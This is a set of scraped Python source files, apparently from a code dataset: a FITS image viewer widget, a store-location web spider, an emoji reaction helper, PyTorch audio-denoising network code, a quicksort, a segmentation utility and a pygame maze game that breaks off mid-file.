Args:\n cuts: Cuts to apply. If None, take from GUI.\n\n Returns:\n Processed image.\n \"\"\"\n\n # get them\n if cuts is None:\n cuts = (self.spinLoCut.value(), self.spinHiCut.value())\n\n # did they change?\n if self.cuts != cuts:\n # store and apply\n self.cuts = cuts\n c1, c2 = self.cuts\n\n # scale data\n data = (self.data - c1) / (c2 - c1)\n\n # trim\n data[data < 0] = 0\n data[data > 1] = 1\n\n # back to short\n data *= 255\n self.scaled_data = np.int8(data)\n\n # now we need to re-create the pixmap\n return self._create_qimage()\n\n def _create_qimage(self):\n \"\"\"Create a QImage from the data.\n\n Returns:\n Processed image.\n \"\"\"\n\n # get shape of image\n height, width = self.data.shape[-2:]\n\n # format\n if len(self.scaled_data.shape) == 2:\n # plain and simple B/W\n format = QtGui.QImage.Format_Indexed8\n bytes_per_line = self.data.shape[1]\n\n else:\n # 3D, i.e. cube, with colour information\n format = QtGui.QImage.Format_RGB888\n bytes_per_line = self.data.shape[2] * 3\n\n # for cubes, move axis\n # this is necessary, because in FITS we store three different images, i.e. sth like RRRRRGGGGGBBBBB,\n # but we need RGBRGBRGBRGBRGB\n data = np.moveaxis(self.scaled_data, 0, 2) if len(self.scaled_data.shape) == 3 else self.scaled_data\n\n # create QImage\n image = QtGui.QImage(data.tobytes(), width, height, bytes_per_line, format)\n\n # flip and return it\n flipped = image.transformed(QtGui.QTransform().scale(1, -1))\n return flipped\n\n def _mouse_moved(self, x: float, y: float):\n \"\"\"Called, whenever the mouse is moved.\n\n Args:\n x: X position of mouse\n y: Y position of mouse\n \"\"\"\n\n # show X/Y\n self.textImageX.setText('%.3f' % x)\n self.textImageY.setText('%.3f' % (self.scaled_data.shape[-2] - y,))\n\n # convert to RA/Dec and show it\n try:\n coord = pixel_to_skycoord(x, y, self.wcs)\n self.textWorldRA.setText(coord.ra.to_string(u.hour, sep=':'))\n self.textWorldDec.setText(coord.dec.to_string(sep=':'))\n except ValueError:\n self.textWorldRA.clear()\n self.textWorldDec.clear()\n\n # get value\n try:\n iy, ix = self.hdu.data.shape[-2] - int(y), int(x)\n value = self.hdu.data[iy, ix]\n except IndexError:\n value = ''\n self.textPixelValue.setText(str(value))\n\n # mean/max\n try:\n # cut\n if len(self.hdu.data.shape) == 2:\n cut = self.hdu.data[iy - 10:iy + 11, ix - 10: ix + 11]\n else:\n cut = self.hdu.data[:, iy - 10:iy + 11, ix - 10: ix + 11]\n\n # calculate and show\n if all([s > 0 for s in cut.shape]):\n self.textAreaMean.setText('%.2f' % np.mean(cut))\n self.textAreaMax.setText('%.2f' % np.max(cut))\n else:\n self.textAreaMean.clear()\n self.textAreaMax.clear()\n\n except ValueError:\n # outside range\n pass\n\n # get zoom in and scale it to 100x100\n pix = self.imageView.cut(x, y, 10).scaled(101, 101)\n\n # draw central pixel\n painter = QtGui.QPainter(pix)\n painter.setPen(QtGui.QPen(QtCore.Qt.white, 1))\n painter.drawRect(48, 48, 4, 4)\n painter.setPen(QtGui.QPen(QtCore.Qt.black, 1))\n painter.drawRect(47, 47, 6, 6)\n painter.end()\n\n # show zoom\n self.labelZoom.setPixmap(pix)\n\n def _colormap_changed(self):\n \"\"\"Called, when colormap is changed.\"\"\"\n\n # get name of colormap\n name = self.comboColormap.currentText()\n if self.checkColormapReverse.isChecked():\n name += '_r'\n\n # get normalization\n stretch = self.comboStretch.currentText()\n if stretch == 'linear':\n norm = colors.Normalize(vmin=0, vmax=250)\n elif stretch == 'log':\n norm = colors.LogNorm(vmin=0.1, vmax=250)\n elif stretch == 'sqrt':\n norm = FuncNorm(np.sqrt, vmin=0, vmax=250)\n elif stretch == 'squared':\n norm = colors.PowerNorm(2, vmin=0, vmax=250)\n elif stretch == 'asinh':\n norm = FuncNorm(np.arcsinh, vmin=0, vmax=250)\n else:\n raise ValueError('Invalid stretch')\n\n # get colormap\n cm = ScalarMappable(norm=norm, cmap=plt.get_cmap(name))\n\n # set it\n self.imageView.setColormap(cm)\n\n # create colorbar image\n colorbar = QtGui.QImage(1, 256, QtGui.QImage.Format_ARGB32)\n for i in range(256):\n rgba = cm.to_rgba(i, bytes=True)\n c = QtGui.QColor(*rgba)\n colorbar.setPixelColor(0, i, c)\n\n # set colorbar\n self.labelColorbar.setPixmap(QtGui.QPixmap(colorbar))\n\n def _trimsec(self, hdu, data=None) -> np.ndarray:\n \"\"\"Trim an image to TRIMSEC.\n\n Args:\n hdu: HDU to take data from.\n data: If given, take this instead of data from HDU.\n\n Returns:\n Numpy array with image data.\n \"\"\"\n\n # no data?\n if data is None:\n data = self.hdu.data.copy()\n\n # keyword not given?\n if 'TRIMSEC' not in hdu.header:\n # return whole data\n return data\n\n # get value of section\n sec = hdu.header['TRIMSEC']\n\n # split values\n s = sec[1:-1].split(',')\n x = s[0].split(':')\n y = s[1].split(':')\n\n # set everything else to NaN\n x0 = int(x[0]) - 1\n x1 = int(x[1])\n y0 = int(y[0]) - 1\n y1 = int(y[1])\n data[:, :x0] = 0\n data[:, x1:] = 0\n data[:y0, :] = 0\n data[y1:, :] = 0\n\n # return data\n return data\n\n def _debayer(self, arr: np.ndarray, pattern: str) -> np.ndarray:\n \"\"\"Debayer an image\"\"\"\n\n # what pattern do we have?\n if pattern == 'GBRG':\n # pattern is: GB\n # RG\n R = arr[1::2, 0::2]\n G = arr[0::2, 0::2] // 2 + arr[1::2, 1::2] // 2\n B = arr[0::2, 1::2]\n\n else:\n raise ValueError('Unknown Bayer pattern.')\n\n # return rescaled cube\n return np.array([resize(a, arr.shape, anti_aliasing=False) for a in [R, G, B]])\n\n\n__all__ = ['QFitsWidget']\n","sub_path":"qfitswidget/qfitswidget.py","file_name":"qfitswidget.py","file_ext":"py","file_size_in_byte":15582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"470449583","text":"import scrapy\n\nfrom locations.items import Feature\nfrom locations.spiders.vapestore_gb import clean_address\n\n\nclass AllsupsSpider(scrapy.Spider):\n name = \"allsups\"\n item_attributes = {\"brand\": \"Allsup's\", \"brand_wikidata\": \"Q4733292\"}\n allowed_domains = [\"allsups.com\"]\n start_urls = [\n \"https://allsups.com/wp-json/acf/v3/business_locations?_embed&per_page=1000\",\n ]\n\n def parse(self, response):\n stores = response.json()\n\n for store in stores:\n properties = {\n \"ref\": store[\"acf\"][\"internal_store_code\"],\n \"name\": store[\"acf\"][\"business_name\"],\n \"street_address\": clean_address([store[\"acf\"][\"address_line_1\"], store[\"acf\"][\"address_line_2\"]]),\n \"city\": store[\"acf\"][\"city\"],\n \"state\": store[\"acf\"][\"state\"],\n \"postcode\": store[\"acf\"][\"postal_code\"],\n \"country\": store[\"acf\"][\"country\"],\n \"lat\": store[\"acf\"][\"latitude\"],\n \"lon\": store[\"acf\"][\"longitude\"],\n \"phone\": store[\"acf\"][\"primary_phone\"],\n }\n\n yield Feature(**properties)\n","sub_path":"locations/spiders/allsups.py","file_name":"allsups.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"620293458","text":"# 🇦 🇧 🇨 🇩 🇪 🇫 🇬 🇭 🇮 🇯 🇰 🇱 🇲 🇳 🇴 🇵 🇶 🇷 🇸 🇹 🇺 🇻 🇼 🇽 🇾 🇿\n# Word Emote Reacting\n\nemoji_dict = {\n \"a\" : \"🇦\",\n \"b\" : \"🇧\",\n \"c\" : \"🇨\",\n \"d\" : \"🇩\",\n \"e\" : \"🇪\",\n \"f\" : \"🇫\",\n \"g\" : \"🇬\",\n \"h\" : \"🇭\",\n \"i\" : \"🇮\",\n \"j\" : \"🇯\",\n \"k\" : \"🇰\",\n \"l\" : \"🇱\",\n \"m\" : \"🇲\",\n \"n\" : \"🇳\",\n \"o\" : \"🇴\",\n \"p\" : \"🇵\",\n \"q\" : \"🇶\",\n \"r\" : \"🇷\",\n \"s\" : \"🇸\",\n \"t\" : \"🇹\",\n \"u\" : \"🇺\",\n \"v\" : \"🇻\",\n \"w\" : \"🇼\",\n \"x\" : \"🇽\",\n \"y\" : \"🇾\",\n \"z\" : \"🇿\"\n}\n\n# Checks for double letters\ndef is_valid_word(word):\n retval = True\n letters = []\n for letter in word:\n if letter not in letters:\n letters.append(letter)\n else:\n retval = False\n\n return retval\n\ndef add_emoji_reaction(word):\n emoji_list = []\n if is_valid_word(word):\n for letter in word:\n emoji_list.append(emoji_dict[letter])\n emoji_list.append(\"❗\")\n \n return emoji_list\n","sub_path":"words.py","file_name":"words.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"200454398","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn import Module\nfrom torch.autograd import Variable\nimport numpy as np\nfrom collections import OrderedDict\nfrom . import densenet_efficient as dens\nfrom . import time_frequence as tf\n\n###############################################################################\n# Functions\n###############################################################################\n\n\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n m.weight.data.normal_(0.0, 0.02)\n elif classname.find('BatchNorm2d') != -1 or classname.find(\n 'InstanceNorm2d') != -1:\n m.weight.data.normal_(1.0, 0.02)\n m.bias.data.fill_(0)\n\n\ndef get_norm_layer(norm_type):\n if norm_type == 'batch':\n norm_layer = nn.BatchNorm2d\n elif norm_type == 'instance':\n norm_layer = nn.InstanceNorm2d\n else:\n print('normalization layer [%s] is not found' % norm_type)\n return norm_layer\n # return None\n\n\ndef define_G(n_fft, hop, gpu_ids=[]):\n netG = None\n use_gpu = len(gpu_ids) > 0\n\n if use_gpu:\n assert (torch.cuda.is_available())\n\n netG = nn.DataParallel(AuFCN(n_fft, hop))\n\n if len(gpu_ids) > 0:\n netG.cuda(device=gpu_ids[0])\n netG.apply(weights_init)\n return netG\n\n\ndef define_D(input_nc,\n ndf,\n which_model_netD,\n n_layers_D=3,\n norm='batch',\n use_sigmoid=False,\n gpu_ids=[]):\n netD = None\n use_gpu = len(gpu_ids) > 0\n norm_layer = get_norm_layer(norm_type=norm)\n\n if use_gpu:\n assert (torch.cuda.is_available())\n if which_model_netD == 'basic':\n netD = NLayerDiscriminator(\n input_nc,\n ndf,\n n_layers=3,\n norm_layer=norm_layer,\n use_sigmoid=use_sigmoid,\n gpu_ids=gpu_ids)\n elif which_model_netD == 'n_layers':\n netD = NLayerDiscriminator(\n input_nc,\n ndf,\n n_layers_D,\n norm_layer=norm_layer,\n use_sigmoid=use_sigmoid,\n gpu_ids=gpu_ids)\n else:\n print('Discriminator model name [%s] is not recognized' %\n which_model_netD)\n if use_gpu:\n netD.cuda(device_id=gpu_ids[0])\n netD.apply(weights_init)\n return netD\n\n\ndef print_network(net):\n num_params = 0\n for param in net.parameters():\n num_params += param.numel()\n print(net)\n print('Total number of parameters: %d' % num_params)\n\n\n##############################################################################\n# Classes\n##############################################################################\n\n\n# Defines the GAN loss which uses either LSGAN or the regular GAN.\n# When LSGAN is used, it is basically same as MSELoss,\n# but it abstracts away the need to create the target label tensor\n# that has the same size as the input\nclass GANLoss(nn.Module):\n def __init__(self,\n use_lsgan=True,\n target_real_label=1.0,\n target_fake_label=0.0,\n tensor=torch.FloatTensor):\n super(GANLoss, self).__init__()\n self.real_label = target_real_label\n self.fake_label = target_fake_label\n self.real_label_var = None\n self.fake_label_var = None\n self.Tensor = tensor\n if use_lsgan:\n self.loss = nn.MSELoss()\n else:\n self.loss = nn.BCELoss()\n\n def get_target_tensor(self, input, target_is_real):\n target_tensor = None\n if target_is_real:\n create_label = ((self.real_label_var is None)\n or (self.real_label_var.numel() != input.numel()))\n if create_label:\n real_tensor = self.Tensor(input.size()).fill_(self.real_label)\n self.real_label_var = Variable(\n real_tensor, requires_grad=False)\n target_tensor = self.real_label_var\n else:\n create_label = ((self.fake_label_var is None)\n or (self.fake_label_var.numel() != input.numel()))\n if create_label:\n fake_tensor = self.Tensor(input.size()).fill_(self.fake_label)\n self.fake_label_var = Variable(\n fake_tensor, requires_grad=False)\n target_tensor = self.fake_label_var\n return target_tensor\n\n def __call__(self, input, target_is_real):\n target_tensor = self.get_target_tensor(input, target_is_real)\n return self.loss(input, target_tensor)\n\n\nclass AuFCNWrapper(nn.Module):\n def __init__(self, n_fft, hop, gpu_ids):\n super(AuFCNWrapper, self).__init__()\n self.gpu_ids = gpu_ids\n self.model = AuFCN(n_fft, hop)\n\n def forward(self, input):\n if self.gpu_ids and isinstance(input.data,\n torch.cuda.FloatTensor):\n output = nn.DataParallel(self.model, input, self.gpu_ids)\n print(\"network G output\", output.size())\n return output\n else:\n return self.model(input)\n\n\n# TODO robust\n# TODO requires gradient\n# TODO assert AC == 0\nclass AuFCN(nn.Module):\n def __init__(self, n_fft, hop):\n super(AuFCN, self).__init__()\n self.mdct_model = tf.mdct(n_fft, hop)\n self.imdct_model = tf.imdct(n_fft, hop)\n fcn = None\n fcn = dens.DenseNetEfficient(growth_rate=12, block_config=(4, 4, 4, 4), compression=0.5,\n num_init_features=24, bn_size=4, drop_rate=0)\n self.fcn = fcn\n\n def forward(self, sample):\n noisy_spec = self.mdct_model(sample)\n fcnOutput = self.fcn(noisy_spec)\n\n clean_spec = fcnOutput * noisy_spec\n estimated_clean_frame = self.imdct_model(clean_spec)\n\n\n return {'time':estimated_clean_frame,\n 'spec':clean_spec}\n\n\nclass Tanh_rescale(Module):\n def forward(self, input):\n return torch.div(\n torch.add(torch.tanh(torch.mul(input, 2.0)), 1.0), 2.0)\n\n def __repr__(self):\n return self.__class__.__name__ + ' ()'\n","sub_path":"models/networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":6151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"105623174","text":"def quick_sort(a):\n quick_sort_internal(a, 0, len(a)-1)\n\n\ndef quick_sort_internal(a, start, end):\n if start < end:\n sorted_pivot_index = get_sorted_pivot_index(a, start, end)\n quick_sort_internal(a, start, sorted_pivot_index - 1)\n quick_sort_internal(a, sorted_pivot_index + 1, end)\n\n\ndef get_sorted_pivot_index(a, start, end):\n pivot_index = get_pivot_index(a, start, end)\n pivot_value = a[pivot_index]\n a[start], a[pivot_index] = a[pivot_index], a[start]\n border = start\n for i in range(start, end+1):\n if a[i] < pivot_value:\n border += 1\n a[i], a[border] = a[border], a[i]\n a[start], a[border] = a[border], a[start]\n return border\n\n\ndef get_pivot_index(a, start, end):\n mid = (start + end)//2\n pivot_value = sorted([start, mid, end])[1]\n if a[start] == pivot_value:\n return start\n elif a[mid] == pivot_value:\n return mid\n else:\n return end\n\n\nlst = [10, 5, 20, -1, 0, 100, 2]\n\nprint(\"original---->\")\nprint(lst)\n\nquick_sort(lst)\n\nprint(\"quick sorted---->\")\nprint(lst)\n","sub_path":"PYTHON/PYTHON_DSA/p06_quick_sort_o_nsquare.py","file_name":"p06_quick_sort_o_nsquare.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"316389499","text":"import numpy as np\n\nfrom chainercv.utils.iterator.split_iterator import split_iterator\n\n\ndef apply_semantic_segmentation_link(target, iterator, hook=None):\n \"\"\"Apply a semantic segmentation link to an iterator\n\n This function applies a semantic segmentation link to an iterator.\n It stacks the outputs of the semantic segmentation link\n against :obj:`pred_labels`.\n This function also stacks the values returned by the iterator\n except the input image.\n These values can be used for evaluation.\n\n Args:\n target (chainer.Link): A semantic segmentation link. This link must\n have :meth:`predict` method which take a list of images and returns\n :obj:`labels`.\n iterator (chainer.Iterator): An iterator. Each sample should have\n an image as its first element. This image is passed to\n :meth:`target.predict` as an argument.\n The rests are stacked against :obj:`gt_values`.\n hook: A callable which is called after each iteration.\n :obj:`pred_labels` and :obj:`gt_values` are passed as arguments.\n Note that these values do not contain data from the previous\n iterations.\n\n Returns:\n An iterator and a tuple:\n This function returns :obj:`pred_labels` and :obj:`gt_values`.\n :obj:`gt_values` is a tuple of iterators. Each iterator corresponds\n to a value of a sample from the iterator.\n For example, if the iterator returns a batch of\n :obj:`(img, val0, val1)`, :obj:`next(gt_values)`\n will be :obj:`(val0, val1)`.\n \"\"\"\n\n iterators = split_iterator(_apply(target, iterator, hook))\n pred_labels = iterators[0]\n gt_values = iterators[1:]\n return pred_labels, gt_values\n\n\ndef _apply(target, iterator, hook):\n for batch in iterator:\n batch_imgs = list()\n batch_gt_values = list()\n\n for sample in batch:\n if isinstance(sample, np.ndarray):\n batch_imgs.append(sample)\n batch_gt_values.append(tuple())\n else:\n batch_imgs.append(sample[0])\n batch_gt_values.append(sample[1:])\n\n batch_pred_labels = target.predict(batch_imgs)\n\n if hook:\n hook(\n batch_pred_labels,\n tuple(list(bv) for bv in zip(*batch_gt_values)))\n\n for pred_label, gt_value in zip(batch_pred_labels, batch_gt_values):\n yield (pred_label,) + gt_value\n","sub_path":"chainercv/utils/iterator/apply_semantic_segmentation_link.py","file_name":"apply_semantic_segmentation_link.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"156728663","text":"import os\nimport sys\nimport math\nimport time\nimport random\n\nfrom operator import itemgetter\n\nimport pygame\n\n\nsys.setrecursionlimit(10**6)\nprint(f'Recursion limit is {sys.getrecursionlimit()}')\n\n\n# группы спрайтов\nALL_SPRITES = pygame.sprite.Group()\nTILES_GROUP = pygame.sprite.Group()\nPLAYER_GROUP = pygame.sprite.Group()\nWALL_GROUP = pygame.sprite.Group()\nFLOOR_GROUP = pygame.sprite.Group()\nCREATURES_GROUP = pygame.sprite.Group()\nTHING_GROUP = pygame.sprite.Group()\nEXIT_GROUP = pygame.sprite.Group()\nBLOOD_GROUP = pygame.sprite.Group()\n\n# свои события\nCREATURE_EVENT_TYPE = 1\nTHING_EVENT_TYPE = 2\n\n\ndef load_image(name, colorkey=None):\n # Загрузка изображений\n fullname = os.path.join('data', name)\n image = pygame.image.load(fullname)\n if colorkey is not None:\n if colorkey == -1:\n colorkey = image.get_at((0, 0))\n image.set_colorkey(colorkey)\n else:\n image = image.convert_alpha()\n return image\n\n\ndef get_sprite_groups_by_type(type):\n # возвращаем группы спрайтов в зависимости от типа\n if type == 'wall': # стена\n return ALL_SPRITES, TILES_GROUP, WALL_GROUP\n if type == 'floor': # пол\n return ALL_SPRITES, TILES_GROUP, FLOOR_GROUP\n if type == 'exit': # выход\n return ALL_SPRITES, TILES_GROUP, EXIT_GROUP\n if type == 'player':\n return ALL_SPRITES, PLAYER_GROUP\n if type in ('spider', 'skeleton', 'bahamut'):\n return ALL_SPRITES, CREATURES_GROUP\n if type in ('coin', 'heart'):\n return ALL_SPRITES, THING_GROUP\n return ALL_SPRITES\n\n\nclass Tile(pygame.sprite.Sprite):\n # tile setting (клетка)\n size = 25\n images = {\n 'wall': load_image('25x25/wall.png'),\n 'floor': load_image('25x25/floor.png'),\n 'exit': load_image('25x25/floor.png'),\n }\n\n def __init__(self, tile_type, pos_x, pos_y):\n self.type = tile_type\n groups = get_sprite_groups_by_type(type=self.type)\n super().__init__(*groups)\n self.image = Tile.images[tile_type]\n self.rect = self.image.get_rect().move(pos_x, pos_y)\n\n\ndef group_collide_mask(target, group):\n # Проверка пересечения с группой спрайтов по маске\n sprites = pygame.sprite.spritecollide(target, group, dokill=False)\n # collide_mask работает только со спрайтами, не с группами!\n if sprites and any(pygame.sprite.collide_mask(target, sprite) for sprite in sprites):\n # Пересечение обнаружено.\n return True\n return False\n\n\nclass AnimatedSprite(pygame.sprite.Sprite):\n def __init__(self, spite_type, sheet, columns, rows, x, y):\n groups = get_sprite_groups_by_type(type=spite_type)\n super().__init__(*groups)\n self.frames = []\n self.cut_sheet(sheet, columns, rows)\n # в качестве начального фрейма берём вид спереди\n self.cur_columns = [0] * rows\n self.cur_row = 0\n self.image = self.frames[self.cur_row][self.cur_columns[self.cur_row]]\n self.rect = self.rect.move(x, y)\n\n # вычисляем маску для эффективного сравнения\n self.mask = pygame.mask.from_surface(self.image)\n\n def cut_sheet(self, sheet, columns, rows):\n # разрезаем изображение, на котором находятся фреймы\n self.rect = pygame.Rect(0, 0, sheet.get_width() // columns, sheet.get_height() // rows)\n for j in range(rows):\n row_frames = []\n for i in range(columns):\n frame_location = (self.rect.w * i, self.rect.h * j)\n row_frames.append(sheet.subsurface(pygame.Rect(frame_location, self.rect.size)))\n self.frames.append(row_frames)\n\n def next_frame(self, row):\n # показ следущего фрейма\n self.cur_row = row\n self.cur_columns[row] = (self.cur_columns[row] + 1) % len(self.frames[row])\n self.image = self.frames[self.cur_row][self.cur_columns[self.cur_row]]\n\n\nclass Thing(AnimatedSprite):\n # Базовый класс Вещи (в том числе монет), которые Игроком может собирать\n def __init__(self, spite_type, sheet, columns, rows, pos_x, pos_y, player):\n self.type = spite_type\n self.x = pos_x\n self.y = pos_y\n self.player = player\n super().__init__(spite_type=self.type, sheet=sheet, columns=columns, rows=rows,\n x=self.x, y=self.y)\n\n def update(self, *args):\n self.next_frame(row=0)\n # Задержка анимации\n pygame.time.set_timer(THING_EVENT_TYPE, 300) # milliseconds\n\n\nclass CoinThing(Thing):\n def __init__(self, pos_x, pos_y, player):\n sheet = load_image('25x25/coin.png')\n columns = 4\n rows = 1\n super().__init__(spite_type='coin', sheet=sheet, columns=columns, rows=rows,\n pos_x=pos_x, pos_y=pos_y, player=player,)\n\n\nclass HeartThing(Thing):\n def __init__(self, pos_x, pos_y, player):\n sheet = load_image('25x25/heart.png')\n columns = 1\n rows = 1\n super().__init__(spite_type='heart', sheet=sheet, columns=columns, rows=rows,\n pos_x=pos_x, pos_y=pos_y, player=player,)\n\n\nclass Creature(AnimatedSprite):\n # Базовый класс Существ, которые ходят по пятам за Игроком\n def __init__(self, spite_type, sheet, columns, rows, pos_x, pos_y, player, step, damage):\n self.type = spite_type\n self.x = pos_x\n self.y = pos_y\n self.player = player\n self.step = step\n self.damage = damage\n super().__init__(spite_type=self.type, sheet=sheet, columns=columns, rows=rows,\n x=self.x, y=self.y)\n\n def update(self, *args):\n x = self.rect.x\n y = self.rect.y\n cur_coord = self.rect.x, self.rect.y # Запомнить текущую позицию\n\n # Всего есть 4-е направления движения приведения\n north = x, y - self.step\n south = x, y + self.step\n west = x - self.step, y\n east = x + self.step, y\n\n # Взять только те направления (координаты), которые не попадают на стену\n coords = []\n for coord in (north, south, west, east):\n self.rect.x, self.rect.y = coord\n\n # Пересечение со стенами.\n if not group_collide_mask(self, WALL_GROUP):\n coords.append(coord) # Пересечения со стенами не обнаружено, координаты принимаются\n\n # Вернуть исходную позицию для следующей проверки в цикле\n self.rect.x, self.rect.y = cur_coord\n\n if len(coords) > 1:\n # Есть 2, 3 или 4 направления движения, при этом одно из них предыдущее\n coords = [coord for coord in coords if coord != cur_coord] # Убираем предыдущую позицию\n # Новую позицию выбираем по принципу \"близости\" к игроку, чтобы противник шёл за играющим\n # Формулы вычисления расстояния между двумя точками, одна из которых позиция игрока (oval)\n # https://ru.onlinemschool.com/math/library/analytic_geometry/point_point_length/\n distances = []\n for x, y in coords:\n # √(xb - xa)^2 + (yb - ya)^2\n distances.append(round(math.sqrt((self.player.rect.x - x) ** 2 + (self.player.rect.y - y) ** 2)))\n self.rect.x, self.rect.y = coords[distances.index(min(distances))]\n else:\n # Застряли в стене -> выйти в любом направлении\n self.rect.x, self.rect.y = north\n\n # Вызвать смену фрейма для нужного направления\n new_coord = self.rect.x, self.rect.y\n if new_coord == north:\n self.next_frame(row=3)\n elif new_coord == south:\n self.next_frame(row=0)\n elif new_coord == west:\n self.next_frame(row=1)\n elif new_coord == east:\n self.next_frame(row=2)\n\n #\n # Проверка пересечения с Игроком (нанести урон)\n #\n if pygame.sprite.collide_mask(self.player, self):\n self.player.health -= self.damage\n create_blood(player=self.player, damage=self.damage)\n\n # Существа ходят с задержкой\n pygame.time.set_timer(CREATURE_EVENT_TYPE, 100) # milliseconds\n\n\nclass SpiderCreature(Creature):\n def __init__(self, pos_x, pos_y, player):\n sheet = load_image('25x25/spider.png')\n columns = 6\n rows = 4\n super().__init__(\n spite_type='spider', sheet=sheet, columns=columns, rows=rows,\n pos_x=pos_x, pos_y=pos_y, player=player, step=3, damage=1, # step - скорость существа\n )\n\n\nclass SkeletonCreature(Creature):\n def __init__(self, pos_x, pos_y, player):\n sheet = load_image('25x25/skeleton.png')\n columns = 3\n rows = 4\n super().__init__(\n spite_type='skeleton', sheet=sheet, columns=columns, rows=rows,\n pos_x=pos_x, pos_y=pos_y, player=player, step=2, damage=2, # step - скорость существа\n )\n\n\nclass BahamutCreature(Creature):\n def __init__(self, pos_x, pos_y, player):\n sheet = load_image('25x25/bahamut.png')\n columns = 3\n rows = 4\n super().__init__(\n spite_type='bahamut', sheet=sheet, columns=columns, rows=rows,\n pos_x=pos_x, pos_y=pos_y, player=player, step=1, damage=10, # step - скорость существа\n )\n\n\nclass Player(AnimatedSprite):\n def __init__(self, pos_x, pos_y):\n self.type = 'player'\n self.health = 100\n self.coins = 0\n self.win = False\n self.x = pos_x\n self.y = pos_y\n sheet = load_image('25x25/player.png')\n columns = 4\n rows = 4\n super().__init__(spite_type=self.type, sheet=sheet, columns=columns, rows=rows,\n x=self.x, y=self.y)\n\n def update(self, *args):\n key_pressed = any(pygame.key.get_pressed())\n\n if key_pressed:\n for step in range(4, 0, -1): # [4, 3, 2, 1]\n cur_coord = self.rect.x, self.rect.y # Запомнить текущую позицию\n\n if pygame.key.get_pressed()[pygame.K_UP]:\n self.rect.y -= step\n # сменить фрейм игрока\n self.next_frame(row=3)\n if pygame.key.get_pressed()[pygame.K_DOWN]:\n self.rect.y += step\n self.next_frame(row=0)\n if pygame.key.get_pressed()[pygame.K_LEFT]:\n self.rect.x -= step\n self.next_frame(row=1)\n if pygame.key.get_pressed()[pygame.K_RIGHT]:\n self.rect.x += step\n self.next_frame(row=2)\n\n #\n # Проверка пересечения с Вещью (вещь подбирается Игроком)\n #\n for sprite in THING_GROUP:\n if pygame.sprite.collide_mask(self, sprite):\n self.add_thing(thing=sprite)\n sprite.kill()\n #\n # Проверка пересечения с Выходами (конец игры, победа)\n #\n for sprite in EXIT_GROUP:\n if pygame.sprite.collide_mask(self, sprite):\n self.win = True\n #\n # Проверка пересечения со стенами\n #\n if group_collide_mask(self, WALL_GROUP):\n # Пересечение со стенами. Отменить текущий ход (восстановить прежние значения)\n self.rect.x, self.rect.y = cur_coord\n else:\n # Пересечения со стенами не обнаружено, ход можно совершить на заданный step\n break\n\n def add_thing(self, thing):\n if isinstance(thing, CoinThing):\n pygame.mixer.Sound('data/sound_effect/coin.wav').play()\n self.coins += 1\n elif isinstance(thing, HeartThing):\n pygame.mixer.Sound('data/sound_effect/pick_up_health.wav').play()\n self.health += 25\n if self.health > 100: # Здоровье не может быть больше 100!\n self.health = 100\n\n\nclass Camera:\n # зададим начальный сдвиг камеры\n def __init__(self, width, height):\n self.dx = 0\n self.dy = 0\n self.width = width\n self.height = height\n\n # сдвинуть объект obj на смещение камеры\n def apply(self, obj):\n obj.rect.x += self.dx\n obj.rect.y += self.dy\n\n # позиционировать камеру на объекте target\n def update(self, target):\n self.dx = -(target.rect.x + target.rect.w // 2 - self.width // 2)\n self.dy = -(target.rect.y + target.rect.h // 2 - self.height // 2)\n\n\ndef generate_level(maze_width, maze_height):\n # Лабиринт в строке закодирован символами: '+', '-', '|' и пробел.\n # Все символы, кроме пробела, рисуются клеткой (tile) типа wall - это стены лабиринта.\n # Символ '|' рисуется прямоугольником (вертикально две клетки (tile) типа wall).\n # Пробел рисуется клеткой (tile) типа floor.\n s = make_maze(maze_width, maze_height)\n print(s)\n lines = s.splitlines()\n\n # Сделать два входа в лабиринт: фактически заменить любой символ на пробел:\n for n, line in enumerate(lines):\n if n == 0 or n == len(lines) - 1: # Первая и последняя строки\n enter = random.randint(1, len(line) - 3)\n lines[n] = lines[n][:enter] + '@@' + lines[n][enter + 2:]\n\n start_x = 0\n start_y = 0\n tile_size = Tile.size\n\n for n, line in enumerate(lines):\n if n % 2 == 0:\n # Горизонтальная линия (3 клетки). Возможные символы: '+', '-' и пробел.\n for k, char in enumerate(line):\n x0 = start_x + (k * tile_size)\n y0 = start_y\n\n if char == '+' or char == '-':\n Tile('wall', x0, y0)\n elif char == ' ':\n Tile('floor', x0, y0)\n elif char == '@':\n Tile('exit', x0, y0)\n\n # Смещение на 1 клетку по Y\n start_y += tile_size\n else:\n # Вертикальная линия (6 клеток). Возможные символы: '|' и пробел.\n for k, char in enumerate(line):\n x0 = start_x + (k * tile_size)\n y0 = start_y\n\n if char == '|':\n Tile('wall', x0, y0)\n Tile('wall', x0, y0 + tile_size)\n elif char == ' ':\n Tile('floor', x0, y0)\n Tile('floor', x0, y0 + tile_size)\n\n # Смещение на 2 клетки по Y\n start_y += 2 * tile_size\n\n\ndef generate_player(taken):\n # Ставим Игрока в центр лабиринта (по возможности)\n for n, tile in enumerate(FLOOR_GROUP):\n if n > len(FLOOR_GROUP) / 2:\n taken.append(n)\n return Player(tile.rect.x, tile.rect.y)\n assert False, 'Слишком маленькое поле - игрок не может быть размещен.'\n\n\ndef generate_content(sprite_class, player, chance, taken):\n for n, tile in enumerate(FLOOR_GROUP):\n if n not in taken:\n # С вероятностью в chance процентов ставится в клетку пола\n if random.randint(1, 10000) / 100 <= chance:\n sprite_class(pos_x=tile.rect.x, pos_y=tile.rect.y, player=player)\n taken.append(n)\n\n\ndef create_menu(screen, color, font, is_mouse_down):\n button_start = pygame.Rect(200, 150, 400, 50)\n button_scores = pygame.Rect(200, 225, 400, 50)\n button_exit = pygame.Rect(200, 300, 400, 50)\n\n # Функция возвращает набор флагов, которые определяют дальнейшее поведение 